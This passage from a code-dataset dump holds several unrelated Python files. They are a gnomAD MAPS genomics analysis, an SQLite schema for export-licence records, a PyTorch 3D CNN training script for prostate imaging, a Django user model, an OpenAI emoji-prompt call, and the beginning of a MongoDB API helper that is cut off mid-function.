I just wanted to be super clear as to how each file was created\n'''\n\n# For code to run, need to git clone onto gnomad_lof on cluster\nimport sys\nsys.path.append('/home/hail/gnomad_lof')\n\nfrom gnomad_hail import *\nfrom gnomad_hail.resources.sample_qc import *\nfrom gnomad_hail.utils.plotting import *\nfrom constraint_utils import *\nfrom tx_annotation import *\n\ndef load_tx_expression_data(tx_ht):\n tx_ht = tx_ht.rows()\n\n def process_expression_data(csq_expression):\n exprs_to_drop = ['ensg', 'csq', 'symbol', 'lof', 'lof_flag', 'mean_proportion']\n expression_data = csq_expression.drop(*exprs_to_drop)\n all_tissues = list(expression_data.values())\n expression_data_list = list(zip(list(expression_data), all_tissues))\n brain_tissues = [x[1] for x in expression_data_list if 'Brain' in x[0]]\n return csq_expression.select('ensg', 'csq', 'symbol', 'lof', 'lof_flag',\n mean_expression=hl.mean(hl.filter(lambda e: ~hl.is_nan(e), all_tissues), filter_missing=True),\n mean_brain_expression=hl.mean(hl.filter(lambda f: ~hl.is_nan(f), brain_tissues), filter_missing=True),\n Brain_Cortex=csq_expression.Brain_Cortex\n )\n\n return tx_ht.annotate(tx_annotation=tx_ht.tx_annotation.map(process_expression_data))\n\ncontext_ht_path = \"gs://gnomad-public/papers/2019-flagship-lof/v1.0/context/Homo_sapiens_assembly19.fasta.snps_only.vep_20181129.ht\"\ncontext_ht = hl.read_table(context_ht_path)\n\n# Import and process gnomad 2.1.1 transcript annotation\nht = hl.read_matrix_table('gs://gnomad-public/papers/2019-tx-annotation/results/salmon_rsem/data/gnomad.exomes.r2.1.1.sites.tx_annotated.brain.cortex.salmon.020520.mt')\nht = ht.filter_rows(~hl.is_missing(ht.tx_annotation))\nht = ht.annotate_rows(tx_annotation = ht.tx_annotation.map(fix_loftee_beta_nonlofs))\nht = load_tx_expression_data(ht)\nht = hl.MatrixTable.from_rows_table(ht)\nht = pull_out_worst_from_tx_annotate(ht)\n\n# Only consider variants that pass RF\nht = ht.rows()\nht = ht.filter(hl.len(ht.filters) == 0)\ncontext = context_ht[ht.key]\nht = ht.annotate(context=context.context, methylation=context.methylation)\nht = prepare_ht(ht, trimer=True, annotate_coverage=False)\n\n# Prepare MAPS data\neven_breaks = [0.999, 0.995, 0.99, 0.98] + list(map(lambda x: x/40, range(39, -1, -1)))\n\nht = ht.filter(ht.freq[0].AN > 125748 * 0.8 * 2)\nmutation_ht = hl.read_table(mutation_rate_ht_path)\n\n\n# Only consider LOFTEE HC pLoFs, missense and synonymous\nht = ht.annotate(keep = hl.case(missing_false=True)\n .when((ht.csq == \"stop_gained\") &(ht.lof == 'HC'), \"keep\")\n .when((ht.csq == \"splice_donor_variant\") &(ht.lof == 'HC'), \"keep\")\n .when((ht.csq == \"splice_acceptor_variant\" ) &(ht.lof == 'HC'), \"keep\")\n .when(ht.csq == \"missense_variant\", \"keep\")\n .when(ht.csq == \"synonymous_variant\", \"keep\").default('filter'))\n\n\nht = ht.filter(ht.keep == \"keep\")\n\n# # Group pLoFs, remember can't calculate MAPs on frameshifts (no mutational model)\nht = ht.annotate(worst_csq = hl.case(missing_false=True)\n .when(ht.csq == \"stop_gained\", \"pLoF\")\n .when(ht.csq == \"splice_donor_variant\", \"pLoF\")\n .when(ht.csq == \"splice_acceptor_variant\", \"pLoF\")\n .when(ht.csq == \"missense_variant\", \"missense_variant\")\n .when(ht.csq == \"synonymous_variant\", \"synonymous_variant\").default('irrev_var'),\n lof = ht.lof)\n\n# # Group pLoFs, remember can't calculate MAPs on frameshifts (no mutational model)\n# ht = ht.annotate(worst_csq = hl.case(missing_false=True)\n# .when(ht.csq == \"stop_gained\", \"stop_gained\")\n# .when(ht.csq == 
\"splice_donor_variant\", \"splice_donor_variant\")\n# .when(ht.csq == \"splice_acceptor_variant\", \"splice_acceptor_variant\")\n# .when(ht.csq == \"missense_variant\", \"missense_variant\")\n# .when(ht.csq == \"synonymous_variant\", \"synonymous_variant\").default('irrev_var'),lof = ht.lof)\n\nprint(\"finished processing\")\n\nconstraint = hl.read_table(constraint_ht_path)\nconstraint = constraint.rename({\"gene\": \"symbol\"})\nconstraint = constraint.key_by(\"symbol\")\nht = ht.key_by(\"symbol\")\n\nht_constraint = ht.annotate(constraint_bin = constraint[ht.symbol].oe_lof_upper_bin,\n constraint_value = constraint[ht.symbol].oe_lof_upper)\n\n# Addded in filtering for max pext low genes\ngenes_to_filter = hl.import_table(\"gs://gnomad-public/papers/2019-tx-annotation/results/salmon_rsem/data/salmon_max_pext_low_genes.020520.tsv.bgz\", force = True)\ngenes_to_filter = genes_to_filter.key_by('symbol')\n\nht_constraint = ht_constraint.filter(~hl.is_defined(genes_to_filter[ht_constraint.key]))\n\n\ndef run_maps_constraint_binexport(f, write, mut_ht = mutation_ht):\n m = maps(f, mut_ht, ['constraint_bin'])\n m.export(write)\n\noe_constraint_bin_below_01 = ht_constraint.filter(ht_constraint.Brain_Cortex < 0.1)\nrun_maps_constraint_binexport(oe_constraint_bin_below_01,\n \"gs://gnomad-public/papers/2019-tx-annotation/results/salmon_rsem/maps/maps.SALMON.low.020520.tsv.bgz\")\nprint('wrote low')\n\noe_constraint_bin_above_09 = ht_constraint.filter(ht_constraint.Brain_Cortex > 0.9)\nrun_maps_constraint_binexport(oe_constraint_bin_above_09,\n \"gs://gnomad-public/papers/2019-tx-annotation/results/salmon_rsem/maps/maps.SALMON.high.020520.tsv.bgz\")\n\nprint('wrote high')\n\noe_constraint_bin_between = ht_constraint.filter((ht_constraint.Brain_Cortex <= 0.9) & (ht_constraint.Brain_Cortex >= 0.1))\nrun_maps_constraint_binexport(oe_constraint_bin_between,\n \"gs://gnomad-public/papers/2019-tx-annotation/results/salmon_rsem/maps/maps.SALMON.medium.020520.tsv.bgz\")\n","repo_name":"macarthur-lab/tx_annotation","sub_path":"analyses/rsem_salmon/maps_rsem_vs_salmon.py","file_name":"maps_rsem_vs_salmon.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"40"} +{"seq_id":"29978722152","text":"#####**************************************************************************#####\n#####\t\t\t\t\t\t\t\tDESCRIPTION\t \t\t\t\t\t\t #####\n#####**************************************************************************#####\n\"\"\"Pre-testing of methods for the Export Records Digitization Project, in particular\nthe back end database.\n\nIssues to to be worked out:\n+ getting info from a csv file\n+ creating the database\n\n\"\"\"\n\nimport sqlite3, os, csv\nos.chdir(r'E:\\MGMA Application Digitization Setup\\Setup\\Application\\DataBase')\n\n####******************************Getting Data From CSV File*********************### \ndata_tuples = [] # container for my tuples\n\nwith open('MGMA_Members.csv', 'rb') as csvfile:\n\tcsvreader = csv.reader(csvfile, dialect = 'excel')\n\tfor line in csvreader:\n\t\tdata_tuples.append(tuple([entry.replace('\\r', \"\").replace('\\n', '').replace('\\xa0', '').upper() \n for entry in line]))\n\ndata_tuples[:5]\n#\n#Test that all tuples are len 5\nall([len(tup) == 3 for tup in data_tuples])\n#Test that there are no None values\nall(test for test in [(val is not None) for tup in data_tuples for val in tup])\n\n\n####******************************Creating the 
Database**************************###\n#create database:\nconn = sqlite3.connect('Factory_Import_Licences.db')\nc = conn.cursor()\n\n#Members Table\nc.execute(\"CREATE TABLE members \\\n (fact_id TEXT PRIMARY KEY,\\\n\tfact_name TEXT NOT NULL,\\\n\tfact_address TEXT NOT NULL)\")\nc.executemany('INSERT INTO members VALUES (?,?,?)', data_tuples)\n\n\n#Order Table\nc.execute(\"CREATE TABLE orders \\\n\t(order_id INTEGER PRIMARY KEY AUTOINCREMENT, \\\n\t fact_id TEXT REFERENCES members(fact_id), \\\n\t mgma_order_id TEXT NOT NULL, \\\n\t buyer TEXT NOT NULL, \\\n\t sub_date TEXT NOT NULL, \\\n\t app_date TEXT NOT NULL, \\\n\t ship_date TEXT NOT NULL, \\\n\t order_fob_curr TEXT NOT NULL,\\\n\t order_cmp_curr TEXT NOT NULL, \\\n\t order_cif_curr TEXT NOT NULL, \\\n\t order_total_fob REAL NOT NULL, \\\n\t order_total_cmp REAL NOT NULL, \\\n\t order_total_cif REAL NOT NULL,\\\n\t num_export_items INTEGER NOT NULL,\\\n\t total_export_quantity INTEGER NOT NULL,\\\n\t num_import_items INTEGER NOT NULL)\")\n\t\t \n#Order Countries\nc.execute(\"CREATE TABLE order_countries \\\n\t(order_id INTEGER REFERENCES orders(order_id), \\\n\t destination_country TEXT NOT NULL)\")\n\n#Export Items\nc.execute(\"CREATE TABLE export_items \\\n\t(order_id INTEGER REFERENCES orders(order_id), \\\n\t export_item_id INTEGER PRIMARY KEY AUTOINCREMENT, \\\n\t export_category TEXT NOT NULL, \\\n\t export_type TEXT NOT NULL, \\\n\t export_description TEXT NOT NULL, \\\n\t export_units INTEGER NOT NULL,\\\n\t export_fob_curr TEXT NOT NULL, \\\n\t export_cmp_curr TEXT NOT NULL,\\\n\t export_fob_value REAL NOT NULL, \\\n\t export_cmp_value REAL NOT NULL)\")\n\n#Import Items\nc.execute(\"CREATE TABLE input_items \\\n\t(order_id INTEGER REFERENCES orders(order_id), \\\n\t input_item_id INTEGER PRIMARY KEY AUTOINCREMENT, \\\n\t input_type TEXT NOT NULL,\\\n\t input_descript TEXT NOT NULL,\\\n\t input_unit TEXT NOT NULL, \\\n\t input_quantity INTEGER NOT NULL,\\\n\t input_curr TEXT NOT NULL, \\\n\t input_value REAL NOT NULL)\")\n\t\t \n#Import/Export Lookup\nc.execute(\"CREATE TABLE import_export_lookup \\\n\t(input_item_id INTEGER REFERENCES input_items(input_item_id),\\\n \t export_item_id INTEGER REFERENCES export_items(export_item_id),\\\n\t input_coefficient REAL NOT NULL)\")\n\n#save database\nconn.commit()\nconn.close()","repo_name":"RMGProjects/Import_License_Digitization","sub_path":"DataBase/SQL_Build_Backend.py","file_name":"SQL_Build_Backend.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"43217027218","text":"import os\nimport pdb\nimport sys\nimport copy\nimport json\nimport time\nimport uuid\nimport pickle\n\nimport h5py\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as lrs\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\n\nIMG_TYPES = [\"adc\", \"bval\", \"ktrans\"]\nPATH = None\nHLEN = 106\n\n#TRAIN_LOADER = TEST_LOADER = CLASSES = None\nnp.random.seed(1337)\ntorch.manual_seed(7331)\n\nNO_EPOCHS = 40\nBATCH_SIZE = 64\nLR = 0.001\nMOM = 0.9\nDROPOUT_RATE = 0.20\nLOSSFUNC = nn.CrossEntropyLoss()\nLOSS_NAME = \"CrossEntropy\"\n\nOPTIM_NAME = \"ADAM\"\nget_optimizer = lambda param: optim.Adam( param, lr = LR, weight_decay = 
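# Two portability notes on SQL_Build_Backend.py above, as a hedged sketch:
# SQLite parses REFERENCES clauses but does not enforce them unless the
# foreign_keys pragma is switched on per connection, and on Python 3 csv.reader
# needs a text-mode handle ('rb' yields bytes). Illustrative only; file and DB
# names are reused from the script:
import csv
import sqlite3

with open('MGMA_Members.csv', 'r', newline='') as f:      # text mode for Python 3 csv
    rows = [tuple(cell.strip().upper() for cell in line)  # loosely mirrors the cleanup above
            for line in csv.reader(f)]

conn = sqlite3.connect('Factory_Import_Licences.db')
conn.execute("PRAGMA foreign_keys = ON")                  # REFERENCES enforced from here on
conn.executemany("INSERT INTO members VALUES (?,?,?)", rows)
conn.commit()
conn.close()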
0.005)\nget_scheduler = lambda opt: lrs.ReduceLROnPlateau(opt, 'min', factor = 0.5, patience = 3, min_lr = 0.0001, verbose = True) if opt is not None else None\n\nclass pcNN3D(nn.Module):\n def __init__(self):\n super(pcNN3D, self).__init__()\n self.epochs_trained = 0\n self.set_layers()\n\n\n def set_layers(self):\n \"\"\"\n Conv/Poll -> Dropout -> BN -> Activation\n \"\"\"\n # Convolutions\n self.layer1 = nn.Sequential(\n nn.Conv3d(3,4,(1,3,3)),\n nn.InstanceNorm3d(4),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer2 = nn.Sequential(\n nn.Conv3d(4,4,(3,3,3)),\n nn.InstanceNorm3d(4),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer3 = nn.Sequential(\n nn.Conv3d(4,8,(1,3,3)),\n nn.InstanceNorm3d(8),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer4 = nn.Sequential(\n nn.Conv3d(8,8,(3,3,3)),\n nn.InstanceNorm3d(8),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer5 = nn.Sequential(\n nn.MaxPool3d((1,2,2)),\n nn.InstanceNorm3d(8),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer6 = nn.Sequential(\n nn.Conv3d(8,16,(1,3,3)),\n nn.InstanceNorm3d(16),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer7 = nn.Sequential(\n nn.Conv3d(16,16,(3,3,3)),\n nn.InstanceNorm3d(16),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer8 = nn.Sequential(\n nn.Conv3d(16,32,(1,3,3)),\n nn.InstanceNorm3d(32),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer9 = nn.Sequential(\n nn.Conv3d(32,32,(3,3,3)),\n nn.InstanceNorm3d(32),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer10 = nn.Sequential(\n nn.Conv3d(32,64,(3,3,3)),\n nn.InstanceNorm3d(64),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer11Dense = nn.Sequential(\n nn.Linear(512, 192),\n nn.ReLU()\n )\n self.layer12Dense = nn.Sequential(\n nn.Linear(192, 90),\n nn.ReLU()\n )\n self.layer13Dense = nn.Sequential(\n nn.Linear(90, 2),\n nn.Softmax()\n )\n\n\n def set_info(self, optimzer_name, lossfunc_name):\n self.optimizer = optimzer_name\n self.lossfunc = lossfunc_name\n self.train_loss = np.inf\n self.valid_loss = np.inf\n self.test_loss = np.inf\n self.train_pct = 0\n self.valid_pct = 0\n self.test_pct = 0\n self.total_time = 0\n\n\n def forward(self, batch):\n x = self.layer1(batch)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n x = self.layer5(x)\n x = self.layer6(x)\n x = self.layer7(x)\n x = self.layer8(x)\n x = self.layer9(x)\n x = self.layer10(x)\n x = x.view(-1, 512)\n x = self.layer11Dense(x)\n x = self.layer12Dense(x)\n x = self.layer13Dense(x)\n #pdb.set_trace()\n return x\n\n\nclass TCIADataset(Dataset):\n def __init__(self, root, transform):\n self.root = root\n self.transform = transform\n\n self.h5 = None\n self.keys = None\n self.classes = None\n self.img_types = None\n self.load_file_keys()\n\n def __len__(self):\n return len(self.keys)\n\n def __getitem__(self, idx):\n name, label = self.keys[idx]\n paths = [\"/\" + \"/\".join([label,it,name]) for it in self.img_types]\n arrs = [self.h5[path][:] for path in paths]\n arr = torch.FloatTensor(arrs).transpose(1,3)\n label = self.classes.index(label)\n return arr, label\n\n def load_file_keys(self):\n self.h5 = h5py.File(self.root, 'r')\n\n # Get Classes\n h5path = '/'\n self.classes = [ key for key in self.h5[h5path].keys()]\n\n # Get Image Types\n h5path += self.classes[0]\n self.img_types = IMG_TYPES#[ key for key in self.h5[h5path].keys()]\n\n # Get File names\n h5path += \"/\" + self.img_types[0]\n names = [ key for key in 
self.h5[h5path].keys()]\n self.keys = [ (name, label) for name in names for label in self.classes ]\n\n self.split_train_valid()\n\n return\n\n def split_train_valid(self, pct = 30):\n self.k = int(len(self.keys) * pct / 100.)\n self.keys = np.random.permutation(self.keys).tolist()\n return\n\n\ndef build_loaders(data_dir, batch_size):\n \"\"\"get train and test data \"\"\"\n\n print_border()\n print_header(\"Building dataloaders for {0} images\".format(\", \".join(IMG_TYPES)))\n\n classes = (\"POS\", \"NEG\")\n\n train_root = data_dir + \"/traindata/volumes/train.h5\"\n test_root = data_dir + \"/testdata/volumes/test.h5\"\n transform = None\n trainset = TCIADataset(train_root, transform)\n validset = TCIADataset(train_root, transform)\n # Split into train and validation set\n validset.keys = trainset.keys[-trainset.k:]\n trainset.keys = trainset.keys[:-trainset.k]\n #pdb.set_trace()\n testset = TCIADataset(test_root, transform)\n\n train_loader = torch.utils.data.DataLoader(trainset,\n batch_size = batch_size,\n shuffle = True,\n num_workers = 0)\n\n valid_loader = torch.utils.data.DataLoader(validset,\n batch_size = batch_size,\n shuffle = True,\n num_workers = 0)\n\n test_loader = torch.utils.data.DataLoader(testset,\n batch_size = batch_size,\n shuffle = True,\n num_workers = 0)\n\n print_header(\"Dataloaders Ready!\")\n print_border()\n\n return train_loader, valid_loader, test_loader, classes\n\n\ndef l2_regularization(net, loss, gamma = 0.005):\n li_reg_loss = 0\n for m in net.modules():\n if isinstance(m,nn.Linear):\n temp_loss = torch.sum(((torch.sum(((m.weight.data)**2),1))**0.5),0)\n li_reg_loss += temp_loss\n\n loss += Variable(gamma * li_reg_loss, requires_grad= True)\n return loss\n\n\ndef training(net, optimizer, lossfunc, number_of_epochs = 1, scheduler = None):\n \"\"\" Train a NN for n epochs\"\"\"\n #global TRAIN_LOADER, TEST_LOADER\n if number_of_epochs == 0:\n return np.inf, np.inf\n\n print_border()\n print_header(\"Training\")\n print_border()\n\n #pdb.set_trace()\n print( '{0:<10s}\\t{1:>10s}\\t{2:>10s}\\t{3:>10s}\\t{4:>10s}\\t{5:>10s}\\t{6:>10s}'\n .format( 'Epoch', 'Batch#', 'Loss Train' , 'Loss Valid', 'pct Train', 'pct Valid', 'Time') )\n\n total_time = net.total_time\n for epoch in range(number_of_epochs):\n start_time = time.time()\n running_loss = 0.0\n correct_count = 0\n total_count = 0\n net.train()\n for j, train_batch in enumerate(TRAIN_LOADER, 0):\n inputs, labels = train_batch[0], train_batch[1]\n inputs, labels = Variable(inputs), Variable(labels)\n\n optimizer.zero_grad()\n result = net(inputs)\n loss = lossfunc(result, labels)\n\n corr, total = count_correct(result.data.numpy(), labels.data.numpy())\n correct_count += corr\n total_count += total\n train_pct = correct_count / total_count\n\n loss.backward()\n optimizer.step()\n\n running_loss += loss.data[0]\n\n if (j + 1) % 128 == 0:\n temp_time = time.time() - start_time\n print('{0:>10d}\\t{1:>10d}\\t{2:>10.5f}\\t{3:>10s}\\t{4:>10.5f}\\t{5:>10s}\\t{6:>10.5f}'\n .format( epoch + 1, j + 1, running_loss / (j + 1), \"\", train_pct, \"\", temp_time))\n else:\n print('{0:<10s}\\t{1:>10d}'.format( \"Training\", j + 1), end = \"\\r\", flush = True)\n\n temp_time = time.time() - start_time\n print('{0:>10d}\\t{1:>10d}\\t{2:>10.5f}\\t{3:>10s}\\t{4:>10.5f}\\t{5:>10s}\\t{6:>10.5f}'\n .format( epoch + 1, j + 1, running_loss / (j + 1), \"\", train_pct, \"\", temp_time))\n\n train_loss = running_loss / (j + 1)\n net.train_loss = train_loss\n net.train_pct = train_pct\n\n valid_loss, valid_pct = validation(net, 
lossfunc, VALID_LOADER)\n net.valid_loss = valid_loss\n net.valid_pct = valid_pct\n\n net.epochs_trained += 1\n etime = time.time() - start_time\n total_time += etime\n print('{0:<10s}\\t{1:<10s}\\t{2:>10.5f}\\t{3:>10.5f}\\t{4:>10.5f}\\t{5:>10.5f}\\t{6:>10.5f}'\n .format( \"Results\", \"\", net.train_loss, net.valid_loss, net.train_pct, net.valid_pct, etime))\n\n print_border()\n print( '{0:<10s}\\t{1:>10s}\\t{2:>10s}\\t{3:>10s}\\t{4:>10s}\\t{5:>10s}\\t{6:>10s}'\n .format( 'Epoch', 'Batch#', 'Loss Train' , 'Loss Valid', 'pct Train', 'pct Valid', 'Time') )\n\n if net.train_pct > 0.90 and net.valid_pct > 0.90:\n print_border()\n print_header(\"!!!Early termination!!!\")\n break\n\n # Adjusting Learning rate\n if scheduler is not None:\n scheduler.step(valid_loss)\n\n print_border()\n print_header(\"Total Training Time :{0:1.9f}\".format(total_time))\n print_border()\n net.total_time += total_time\n\n print_border()\n print_header(\"TESTING\")\n test_loss, test_pct = validation(net, lossfunc, TEST_LOADER, 'testing')\n print_header(\"TEST LOSS {0:5.4f}, TEST PCT {1:5.4f}\".format(test_loss, test_pct))\n print_border()\n net.test_loss = test_loss\n net.test_pct = test_pct\n\n save_net_info(net, optimizer, lossfunc)\n\n return net\n\n\ndef validation(net, lossfunc, loader, loader_type = 'validating'):\n \"\"\" Loop of test data and compute test loss\"\"\"\n net.eval()\n valid_loss = 0.0\n start_time = time.time()\n correct_count, total_count = 0, 0\n for j, test_batch in enumerate(loader, 0):\n inputs, labels = test_batch[0], test_batch[1]\n inputs, labels = Variable(inputs), Variable(labels)\n result = net(inputs)\n\n corr, total = count_correct(result.data.numpy(), labels.data.numpy())\n correct_count += corr\n total_count += total\n\n valid_loss += lossfunc(result, labels).data[0]\n\n print('{0:<10s}\\t{1:>10d}\\t{2:>10.5f}'.format( loader_type, j + 1, net.train_loss), end = \"\\r\", flush = True)\n\n valid_loss = valid_loss / (j + 1)\n valid_pct = correct_count / total_count\n\n return valid_loss, valid_pct\n\n\ndef count_correct(res, lab):\n res = np.argmax(res, axis = 1)\n corr = np.sum(res == lab)\n count = len(res)\n return corr, count\n\n\ndef save_net_info(net, optimizer, lossfunc):\n path = os.path.realpath(PATH+\"/../../\")\n with open(path + \"/top5_info.json\",'r') as jsoninfo:\n top_info = json.load(jsoninfo)\n compare = [net.valid_loss < top_loss for top_loss in top_info['top_5_valid_loss']]\n\n print_border()\n if any(compare):\n net_name = str(uuid.uuid4()).split(\"-\")[-1]\n rank = 6 - sum(compare)\n\n print_header(\"Neural Net ranked {0:d}\".format(rank))\n print_header(\"Saving net, optimizer, loss function and information\")\n\n net_results = {\n \"net_name\" : net_name ,\n \"rank\" : rank,\n \"net_parameters\" : str(net),\n \"train_loss\" : net.train_loss,\n \"test_loss\" : net.test_loss,\n \"valid_loss\" : net.valid_loss,\n \"train_pct\" : net.train_pct,\n \"test_pct\" : net.test_pct,\n \"valid_pct\" : net.valid_pct,\n \"train_time\" : net.total_time,\n \"optimizer_name\" : net.optimizer,\n \"optimizer_info\" : None,\n \"lossfunc_name\" : net.lossfunc,\n \"lossfunc_info\" : dict(lossfunc.state_dict())\n }\n try:\n net_results['optimizer_info'] = dict(optimizer.state_dict())[\"param_groups\"]\n net_results['lossfunc_info'] = dict(lossfunc.state_dict())[\"param_groups\"]\n except:\n pass\n\n top_info['top_5_valid_loss'].insert(rank - 1, net.valid_loss)\n top_info['top_5_train_loss'].insert(rank - 1, net.train_loss)\n top_info['info'].insert(rank - 1, 
net_results)\n\n top_info['top_5_valid_loss'].pop(-1)\n top_info['top_5_train_loss'].pop(-1)\n old = top_info['info'].pop(-1)\n\n # Create dir, move old\n os.mkdir( path + \"/nets/\" + net_name)\n cpcall = \"cp %s/pcNN3D.py %s\" % (path + \"/src\", path + \"/nets/\" + net_name + \"/\")\n os.system(cpcall)\n\n movecall = \"mv %s/ %s\" % (path + \"/nets/\" + old['net_name'],\n path + \"/nets/old\" )\n os.system(movecall)\n\n filename = path + \"/nets/\" + net_name + \"/pcNN3D.pk\"\n with open(filename, 'wb') as NNBinary:\n pickle.dump(net, NNBinary)\n\n filename = path + \"/nets/\" + net_name + \"/optimizer.pk\"\n with open(filename, 'wb') as optimizerBinary:\n pickle.dump(optimizer, optimizerBinary)\n\n filename = path + \"/nets/\" + net_name + \"/lossfunc.pk\"\n with open(filename, 'wb') as lossfuncBinary:\n pickle.dump(lossfunc, lossfuncBinary)\n\n filename = path + \"/nets/\" + net_name + \"/info.json\"\n with open(filename,'w') as jsoninfo:\n json.dump(net_results, jsoninfo, indent=2)\n\n # update top five info\n filename = path + \"/top5_info.json\"\n with open(filename, 'w') as jsoninfo:\n json.dump(top_info, jsoninfo, indent=2)\n\n print_header(\"Files saved in folder {0:s}\".format(net_name))\n print_border()\n\n else:\n print_header(\"Neural Net did not rank in top 5\")\n print_border()\n\n return\n\n\ndef print_header(header):\n prl = (HLEN//2-len(header)//2) - 1\n prr = HLEN - prl - len(header) - 2\n print(\"#\" + \" \"*prl + header + \" \"*prr + \"#\")\n return\n\n\ndef print_border():\n print(\"-\"*HLEN)\n return\n\n\ndef load_net(dirname):\n \"\"\" Load pretrained Neural Net From Binary file\"\"\"\n path = os.path.realpath(PATH+\"/../../nets/\"+dirname)\n with open(path + \"/pcNN3D.pk\", 'rb') as NNBinary: # must match the name used in save_net_info\n net = pickle.load(NNBinary)\n with open(path + \"/optimizer.pk\", 'rb') as optimizerBinary:\n optimizer = pickle.load(optimizerBinary)\n with open(path + \"/lossfunc.pk\", 'rb') as lossfuncBinary:\n lossfunc = pickle.load(lossfuncBinary)\n\n return net, optimizer, lossfunc\n\n\ndef load_ranked_n(n = 1):\n \"\"\" Loads the neural network ranked n\"\"\"\n if n < 1 or n > 5:\n print(\"Only storing top 5\")\n return None, None, None\n\n path = os.path.realpath(PATH+\"/../../\")\n with open(path + \"/top5_info.json\",'r') as jsoninfo:\n top_info = json.load(jsoninfo)\n\n dirname = top_info['info'][n - 1][\"net_name\"]\n net, optimizer, lossfunc = load_net(dirname)\n\n return net, optimizer, lossfunc\n\n\nif __name__ == '__main__':\n PATH = os.path.realpath(sys.argv[0])\n data_dir = os.path.dirname(os.path.dirname(PATH)) # str.rstrip strips a character set, not a suffix\n\n net = pcNN3D()\n net.set_info(OPTIM_NAME, LOSS_NAME) # set_info expects (optimizer_name, lossfunc_name)\n\n TRAIN_LOADER, VALID_LOADER, TEST_LOADER, CLASSES = build_loaders(data_dir, BATCH_SIZE)\n\n OPTIMIZER = get_optimizer( net.parameters() )\n SCHEDULER = get_scheduler(OPTIMIZER)\n\n net = training(net, OPTIMIZER, LOSSFUNC, NO_EPOCHS, SCHEDULER)\n #gen = enumerate(VALID_LOADER)\n #inp = next(gen)\n #inp = Variable(inp[1][0])\n #res = net(inp)\n #net.eval()\n #res2 = net(inp)\n #save_net_info(net, optimizer, lossfunc)\n #net1, optimizer1, lossfunc1 = load_ranked_n(1)\n","repo_name":"mortenvester1/tcia-challenge","sub_path":"src/pcNN3D.py","file_name":"pcNN3D.py","file_ext":"py","file_size_in_byte":16776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"35652440559","text":"from django.db import models\n\n# Create your models here.\n\n\nclass Lifanguser(models.Model):\n \n email = models.EmailField(max_length=128,\n verbose_name='사용자 이메일')\n \n password = 
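# Two era notes on pcNN3D.py above, shown as a hedged sketch: nn.CrossEntropyLoss
# applies log-softmax internally, so feeding it the net's final nn.Softmax output
# flattens the gradients (returning raw logits is the usual fix), and loss.data[0]
# became loss.item() from PyTorch 0.4 on. A minimal evaluation loop under those
# assumptions:
import torch

def evaluate(net, loader, lossfunc):
    net.eval()
    total_loss, correct, seen = 0.0, 0, 0
    with torch.no_grad():                        # no autograd bookkeeping at eval time
        for inputs, labels in loader:
            logits = net(inputs)
            total_loss += lossfunc(logits, labels).item() * labels.size(0)
            correct += (logits.argmax(dim=1) == labels).sum().item()
            seen += labels.size(0)
    return total_loss / max(seen, 1), correct / max(seen, 1)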
models.CharField(max_length=128,\n verbose_name='비밀번호')\n \n level = models.CharField(max_length=64,\n verbose_name='등급',\n choices={\n ('admin', 'admin'),\n ('user', 'user'),\n \n \n })\n \n \n registered_dttm = models.DateTimeField(auto_now_add=True,\n verbose_name='등록시간')\n \n def __str__(self):\n return self.email\n \n \n class Meta:\n db_table = 'lifang_django_lifanguser'\n verbose_name = '사용자'\n verbose_name_plural = '사용자'\n ","repo_name":"swavepark1/lifangdjango","sub_path":"lifanguser/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28885172504","text":"import os\nimport openai\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\nresponse = openai.Completion.create(\n engine=\"davinci\",\n prompt=\"Back to Future: 👨👴🚗🕒\\nBatman: 🤵🦇\\nTransformers: 🚗🤖\\nWonder Woman: 👸🏻👸🏼👸🏽👸🏾👸🏿\\nWinnie the Pooh: 🐻🐼🐻\\nThe Godfather: 👨👩👧🕵🏻‍♂️👲💥\\nGame of Thrones: 🏹🗡🗡🏹\\nSpider-Man:\",\n temperature=0.8,\n max_tokens=60,\n top_p=1.0,\n frequency_penalty=0.0,\n presence_penalty=0.0,\n stop=[\"\\n\"]\n)","repo_name":"shoblo/1111tenp","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17591686412","text":"\"\"\"\nMongoDB database APIs.\n\"\"\"\nimport copy\nfrom typing import Dict, List, Any\nimport requests\nfrom . import settings\n\n\ndef create_session() -> requests.Session:\n \"\"\"Create a session with the API header.\n\n Returns:\n requests.Session: Session with the API header.\n \"\"\"\n session = requests.Session()\n session.headers.update(settings.HEADERS)\n return session\n\n# let's create our own API function to insert one recipe\n\n\ndef insert_one(recipe: Dict[str, Any]) -> 'requests.Response':\n \"\"\"Insert one recipe into the database.\n\n Args:\n recipe (Dict[str, Any]): Recipe to insert.\n\n Returns:\n requests.Response: Response from the API.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/insertOne'\n print(action)\n payload: Dict[str, Any] = 